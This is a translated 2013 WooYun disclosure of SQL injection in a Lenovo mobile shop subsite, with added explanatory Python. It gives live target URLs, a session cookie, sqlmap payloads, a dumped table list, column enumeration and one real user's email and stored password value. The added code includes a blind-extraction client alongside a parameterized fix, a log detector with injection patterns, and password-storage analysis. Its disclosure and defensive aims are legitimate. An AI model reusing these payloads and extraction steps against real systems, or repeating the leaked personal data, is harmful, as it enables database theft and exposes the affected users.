
Vulnerability summary

Defect ID: wooyun-2013-035168

Title: Lenovo security issue no. 4: two more SQL injections on a subsite (plaintext passwords of a large number of users)

Vendor: Lenovo

Author: VIP

Submitted: 2013-08-25 11:11

Fix time: 2013-10-09 11:11

Public disclosure: 2013-10-09 11:11

Type: SQL injection

Severity: Medium

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2013-08-25: Details sent to the vendor, awaiting vendor handling
2013-08-26: Vendor confirmed, details disclosed to the vendor only
2013-09-05: Details disclosed to core white hats and relevant domain experts
2013-09-15: Details disclosed to regular white hats
2013-09-25: Details disclosed to intern white hats
2013-10-09: Details disclosed to the public

Brief description:

Plenty of vulnerabilities here.
PS: so this is how cheap Lenovo's internal employee pricing is: the Lenovo A656 smartphone retails for 1399 but is 851 on internal purchase; the leather case retails for 149, internally 34; the protective shell retails for 55, internally 9.5. Internal group buys are far cheaper than retail; the retail markup is really something!

Detailed description:

Injection points:
1. http://ess.lenovomobile.com/shopLst.aspx?RackCode=A11
2. http://ess.lenovomobile.com/shopLst.aspx?PageSize=20&PageNum=1&OrderBy=PublishDate+Desc&EchoType=1&RackCode=A11
Both require a logged-in session, which is probably why they were not found earlier.
Use this cookie: ASP.NET_SessionId=h3t1sdbpwidnyd45y2ntf0ni (if it does not work, the session has expired)

Proof of vulnerability:

---
Place: GET
Parameter: RackCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: RackCode=A11' AND 9638=9638 AND 'NoGV'='NoGV
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: RackCode=A11' AND 9922=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR
(107)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9922=9922) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(99)+CHAR(109)+CHAR(104)+CHAR(113))) AND 'lmYB'='lmYB
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: RackCode=A11'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: RackCode=A11' WAITFOR DELAY '0:0:5'--
---
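What the boolean-based payload above actually does, as an added example that is not part of the original report or of Lenovo's code: a hypothetical reconstruction of the shopLst.aspx query with RackCode concatenated into the SQL text, the same query with the value bound as a parameter (the fix the report's "filter it" advice should really be), and a small client that drives the true/false oracle to pull a table name one character at a time, the way the `[INFO] retrieved:` lines further down were produced. SQLite in memory stands in for the SQL Server 2008 that sqlmap fingerprinted, the EssGoods rows are invented, and the WAITFOR DELAY payloads are T-SQL only and are not reproduced.

```python
import sqlite3

# Constructed stand-in for lmshop: SQLite in memory instead of SQL Server 2008,
# with invented rows. Only the boolean-based payload is reproduced; WAITFOR
# DELAY is T-SQL and has no SQLite equivalent.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE EssGoods (GoodsID INTEGER, RackCode TEXT, GoodsName TEXT)")
    db.executemany("INSERT INTO EssGoods VALUES (?, ?, ?)", [
        (1, "A11", "A656 handset"),
        (2, "A11", "A656 leather case"),
        (3, "B20", "protective shell"),
    ])
    return db

def list_goods_vulnerable(db, rack_code):
    # Hypothetical reconstruction of the shopLst.aspx query. The sqlmap payload
    # (A11' AND ... AND 'NoGV'='NoGV) only works if RackCode is concatenated
    # inside a single-quoted literal, so that is what this does.
    sql = "SELECT GoodsID FROM EssGoods WHERE RackCode = '" + rack_code + "' ORDER BY GoodsID"
    return [row[0] for row in db.execute(sql)]

def list_goods_fixed(db, rack_code):
    # Same query with RackCode bound as a parameter: the value never becomes
    # part of the SQL text, so quotes and AND clauses inside it are just data.
    sql = "SELECT GoodsID FROM EssGoods WHERE RackCode = ? ORDER BY GoodsID"
    return [row[0] for row in db.execute(sql, (rack_code,))]

TRUE_PAYLOAD = "A11' AND 9638=9638 AND 'NoGV'='NoGV"    # payload from the sqlmap summary

class BlindClient:
    """Drives the boolean oracle the way sqlmap does: one request per question."""
    def __init__(self, db, query_fn):
        self.db, self.query_fn, self.requests = db, query_fn, 0
        self.baseline = query_fn(db, "A11")          # the normal page for RackCode=A11

    def ask(self, condition):
        self.requests += 1
        probed = self.query_fn(self.db, "A11' AND " + condition + " AND 'NoGV'='NoGV")
        return probed == self.baseline               # same rows back => condition true

    def extract(self, subquery, max_len=64):
        # Recover a string one character at a time by binary search on its code
        # point. Each '[INFO] retrieved:' value in the dump costs this many
        # requests, which is why 8203 EssMember rows take hours at ~6 s per value.
        out = ""
        for pos in range(1, max_len + 1):
            lo, hi = 0, 127                          # 0 = past the end of the string
            while lo < hi:
                mid = (lo + hi) // 2
                cond = "coalesce(unicode(substr((%s),%d,1)),0)>%d" % (subquery, pos, mid)
                if self.ask(cond):
                    lo = mid + 1
                else:
                    hi = mid
            if lo == 0:
                break
            out += chr(lo)
        return out

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload:", list_goods_vulnerable(db, TRUE_PAYLOAD))   # [1, 2]
    print("fixed, payload:     ", list_goods_fixed(db, TRUE_PAYLOAD))        # []
    client = BlindClient(db, list_goods_vulnerable)
    name = client.extract("SELECT name FROM sqlite_master WHERE type='table'")
    print("table name via oracle:", name, "in", client.requests, "requests")   # EssGoods in 63 requests
```

The parameterized version returns nothing for the payload because the whole string is compared against RackCode as data, and the oracle built on it never distinguishes true from false. Note the request count: one eight-character string costs 63 oracle queries, so a dump of the whole EssMember table is slow and leaves thousands of near-identical requests in the server log.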


Database: lmshop
[89 tables]
+--------------------------+
| EssCarDtl |
| EssCarMst |
| EssCmpRegiForm |
| EssFavorites |
| EssGoods |
| EssGoodsColor |
| EssGoodsPresent |
| EssGoodsPrice_Log |
| EssMember |
| EssOrder |
| EssSales |
| EssSalesGoods |
| EssSalesMail |
| EssVerifyCode |
| JB_QuickLogin |
| MailBasSet |
| MailSet |
| MailTemplate |
| MailToDtl |
| MailToGrp |
| MstCode |
| MstCsErr |
| MstCsLog |
| MstCsMenu |
| MstCsUser |
| MstMenu |
| MstMessage |
| MstRole |
| MstRoleMenu |
| MstRoleUser |
| MstUser |
| PmtActivities |
| PmtAttach |
| PmtAttendance |
| PmtFee |
| PmtGoods |
| PmtImg |
| PmtImgSize |
| PmtOrder |
| PmtOrderWithDraw |
| PmtPromoter |
| PmtQA |
| PmtSettle |
| PmtSettleDtl |
| PmtSettleOrder |
| PmtSettleOrderTmp |
| PmtSettleSim |
| PmtSettleSimDtl |
| PmtVerifyCode |
| RECEIVE |
| SEND |
| SellBigOrder |
| SellCustomize |
| SellJoinEnterprise |
| SellJoinPerson |
| ShopCard |
| SmsBasSet |
| SmsClass |
| SmsDueSend |
| SmsDueSendRec |
| SmsNormalIF |
| SmsNormalIFCC111021 |
| SmsNormalIfRec |
| SmsReceive |
| SmsReceiveType |
| SmsSend |
| SmsSend100601 |
| SmsSend100602 |
| SmsSendRec |
| SmsSysSet |
| SmsTempIF |
| SmsTempIfRec |
| SmsTemplate |
| SmsUserRight |
| SmsWhiteBlackBill |
| TrnFeedback |
| TrnNews |
| V_EssGoodsPrice |
| V_GetPayTypeByDistrictID |
| V_OrderGoodsType |
| V_PmtFee |
| V_UserMenu |
| ZSmsNormalIF100601 |
| ZSmsNormalIF110916 |
| ZSmsNormalIF111018 |
| bakUp_LMmbrid |
| dtproperties |
| pangolin_test_table |
| sms.SmsNormalIFCC |
+--------------------------+


[13:58:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
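The fingerprint says IIS 7.5, so every request in the summary above is in the W3C log with its query string and time-taken. An added example, not from the report or from Lenovo: a detector over constructed IIS log lines (invented timestamps and client addresses) that carry the report's payloads URL-encoded, flagging the sqlmap payload shapes and treating a WAITFOR DELAY request whose time-taken is near five seconds as a confirmed time-based injection rather than just an attempt. The rules are mine and cover only the four payload types sqlmap listed.

```python
import re
from urllib.parse import unquote_plus

# Detection rules keyed to the payload shapes in the sqlmap summary above.
RULES = [
    ("tautology",     re.compile(r"'\s*AND\s+(\d+)\s*=\s*\1\b", re.I)),   # A11' AND 9638=9638
    ("error_convert", re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I)),        # CONVERT(INT,(SELECT ...
    ("char_concat",   re.compile(r"(?:CHAR\(\d+\)\+){2,}", re.I)),         # CHAR(113)+CHAR(117)+...
    ("waitfor",       re.compile(r"WAITFOR\s+DELAY", re.I)),               # ; WAITFOR DELAY '0:0:5'--
]
SLOW_MS = 4000   # WAITFOR DELAY '0:0:5' shows up as time-taken near 5000 ms

def parse_w3c(text):
    """Yield one dict per request line of an IIS W3C log, using its #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue                      # sample lines have no space-containing fields
        yield dict(zip(fields, values))

def scan_iis_log(text):
    """Return one finding per request whose decoded query matches an injection rule."""
    findings = []
    for rec in parse_w3c(text):
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        decoded = unquote_plus(query)      # IIS logs the query as the client sent it
        hits = [name for name, rx in RULES if rx.search(decoded)]
        if not hits:
            continue
        try:
            taken = int(rec.get("time-taken", "0"))
        except ValueError:
            taken = 0
        if "waitfor" in hits and taken >= SLOW_MS:
            hits.append("slow_response")   # the delay executed: injection confirmed, not just attempted
        findings.append({
            "time": rec["date"] + " " + rec["time"],
            "client": rec.get("c-ip"),
            "uri": rec.get("cs-uri-stem"),
            "query": decoded,
            "rules": hits,
            "time_taken": taken,
        })
    return findings

# Constructed sample log: invented timestamps and addresses, payloads from the report.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2013-08-25 03:58:20 GET /shopLst.aspx RackCode=A11 192.0.2.10 200 31
2013-08-25 03:58:21 GET /shopLst.aspx RackCode=A11%27%20AND%209638%3D9638%20AND%20%27NoGV%27%3D%27NoGV 192.0.2.10 200 30
2013-08-25 03:58:22 GET /shopLst.aspx RackCode=A11%27%20AND%209922%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28117%29%2BCHAR%28107%29%29%29%20AND%20%27lmYB%27%3D%27lmYB 192.0.2.10 500 28
2013-08-25 03:58:23 GET /shopLst.aspx RackCode=A11%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 192.0.2.10 200 5047
2013-08-25 03:58:30 GET /shopLst.aspx PageSize=20&PageNum=1&OrderBy=PublishDate+Desc&RackCode=B20 198.51.100.7 200 27
"""

if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["rules"], f["time_taken"], "ms")
```

Three of the five sample requests are flagged, all from one client; the legitimate B20 request with `OrderBy=PublishDate+Desc` is not. The slow_response tag on the WAITFOR line is the one that matters for triage: a 5-second time-taken on a request that asked for a 5-second delay means the statement ran, so the endpoint is injectable and the authenticated session that sent it should be pulled from the logs next.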


[13:59:59] [INFO] fetching columns for table 'EssMember' in database 'lmshop'
[14:00:06] [INFO] the SQL query used returns 12 entries
[14:00:13] [INFO] retrieved: Email
[14:00:20] [INFO] retrieved: varchar
[14:00:27] [INFO] retrieved: IsValid
[14:00:34] [INFO] retrieved: nvarchar
[14:00:41] [INFO] retrieved: MbrID
[14:00:47] [INFO] retrieved: bigint
[14:00:54] [INFO] retrieved: MbrName
[14:01:00] [INFO] retrieved: varchar
[14:01:06] [INFO] retrieved: Password
[14:01:12] [INFO] retrieved: nvarchar
[14:01:19] [INFO] retrieved: Phone
[14:01:26] [INFO] retrieved: nvarchar
[14:01:33] [INFO] retrieved: RegDate
[14:01:39] [INFO] retrieved: datetime
[14:01:45] [INFO] retrieved: RegID
[14:01:51] [INFO] retrieved: nvarchar
[14:01:57] [INFO] retrieved: SalesCode
[14:02:02] [INFO] retrieved: varchar
[14:02:07] [INFO] retrieved: SalesID
[14:02:13] [INFO] retrieved: bigint
[14:02:18] [INFO] retrieved: UpdDate
[14:02:23] [INFO] retrieved: datetime
[14:02:29] [INFO] retrieved: UpdID
[14:02:35] [INFO] retrieved: nvarchar
[14:02:35] [INFO] fetching entries for table 'EssMember' in database 'lmshop'
[14:02:41] [INFO] retrieved: 8203
[14:02:41] [INFO] fetching number of distinct values for column 'Email'
[14:02:47] [INFO] retrieved: 8196
[14:02:47] [INFO] fetching number of distinct values for column 'MbrID'
[14:02:53] [INFO] retrieved: 8203
[14:02:53] [INFO] using column 'MbrID' as a pivot for retrieving row data
[14:02:59] [INFO] retrieved: 1
[14:03:05] [INFO] retrieved: lihe@cmbchina.com
[14:03:10] [INFO] retrieved:
[14:03:16] [INFO] retrieved:
[14:03:22] [INFO] retrieved:
[14:03:27] [INFO] retrieved: 1
[14:03:34] [INFO] retrieved: lihe
[14:03:40] [INFO] retrieved: 05 20 2009 11:27AM
[14:03:46] [INFO] retrieved: 1
[14:03:52] [INFO] retrieved: 05 20 2009 11:27AM
[14:03:57] [INFO] retrieved: FE24W1UJNg1QedCl+4dKFw==


The password is base64, no less!!! How is that any different from plaintext!!!
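A check worth doing on that value before calling it plaintext, added here and not part of the report: the string is 24 base64 characters ending in "==", which is 16 bytes, and those bytes are not printable, so this is not base64-wrapped plaintext but a 128-bit value. That is consistent with either an unsalted MD5 digest or one block of reversible encryption (one AES block, or two DES blocks) under a key held by the application; a single dumped row cannot tell the two apart. Both fail as password storage, the digest because it is table-cracked, the encrypted block because whoever holds the key reads every password, so the report's conclusion stands even though the mechanism differs. The example below classifies the stored value, tests the unsalted-MD5 hypothesis against two constructed guesses, and shows the salted PBKDF2 storage the column should hold instead; the iteration count is an assumption for the example.

```python
import base64
import binascii
import hashlib
import hmac
import os

# Value copied from the EssMember dump above (column 'Password' of MbrID 1).
STORED = "FE24W1UJNg1QedCl+4dKFw=="

def classify_stored_password(value):
    """Decode a stored credential and report what kind of storage it resembles."""
    try:
        raw = base64.b64decode(value, validate=True)
    except binascii.Error:
        return {"base64": False, "kind": "not base64"}
    printable = all(0x20 <= b <= 0x7E for b in raw)
    if printable:
        kind = "base64-wrapped plaintext"            # anyone can read it back
    elif len(raw) == 16:
        kind = "128-bit binary: unsalted MD5 digest or one cipher block"
    else:
        kind = "opaque binary (%d bytes)" % len(raw)
    return {"base64": True, "length": len(raw), "printable": printable, "kind": kind}

def b64_md5(password):
    """base64(MD5(password)): what an unsalted-MD5 column would hold."""
    return base64.b64encode(hashlib.md5(password.encode("utf-8")).digest()).decode("ascii")

def match_unsalted_md5(value, candidates):
    """Test the unsalted-MD5 hypothesis: return the candidate whose b64_md5 equals value."""
    for pw in candidates:
        if b64_md5(pw) == value:
            return pw
    return None

# What the column should hold instead: per-user salt, iterated PBKDF2-HMAC-SHA256.
PBKDF2_ITERATIONS = 200_000   # assumption for the example; tune to the cost budget

def hash_password(password, salt=None):
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        PBKDF2_ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )

def verify_password(password, stored):
    algo, iters, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iters))
    return hmac.compare_digest(actual, expected)    # constant-time comparison

if __name__ == "__main__":
    print(classify_stored_password(STORED))
    print("MD5 guess:", match_unsalted_md5(STORED, ["123456", "password"]))   # None
    h = hash_password("correct horse")
    print(h)
    print(verify_password("correct horse", h), verify_password("wrong", h))   # True False
```

Running `classify_stored_password` on the dumped value reports 16 non-printable bytes. If `match_unsalted_md5` over a real wordlist starts returning matches, the column is unsalted MD5; if it never does, it is almost certainly reversibly encrypted, and the application's connection string or config holds the key, which is the next thing to look for in an assessment of this host.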

Fix:

Filter the input (better: bind RackCode as a query parameter instead of concatenating it into the SQL).

Copyright: please credit VIP@WooYun when reposting


Vendor response

Vendor reply:

Severity: High

Rank: 20

Confirmed: 2013-08-26 01:33

Vendor comment:

Thank you for your contribution to Lenovo's security! We will assess and fix the relevant vulnerabilities immediately.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-08-26 02:35 | Sct7p ( intern white hat | Rank:62 vulns:9 | Between understanding and not understanding there is only a sheet of paper; those who understand feel it is very...)

    /././ sounds like rank farming

  2. 2013-08-26 08:39 | 肥猪 ( passer-by | Rank:0 vulns:1 | none)

    Now I have seen two sides of Lenovo's true face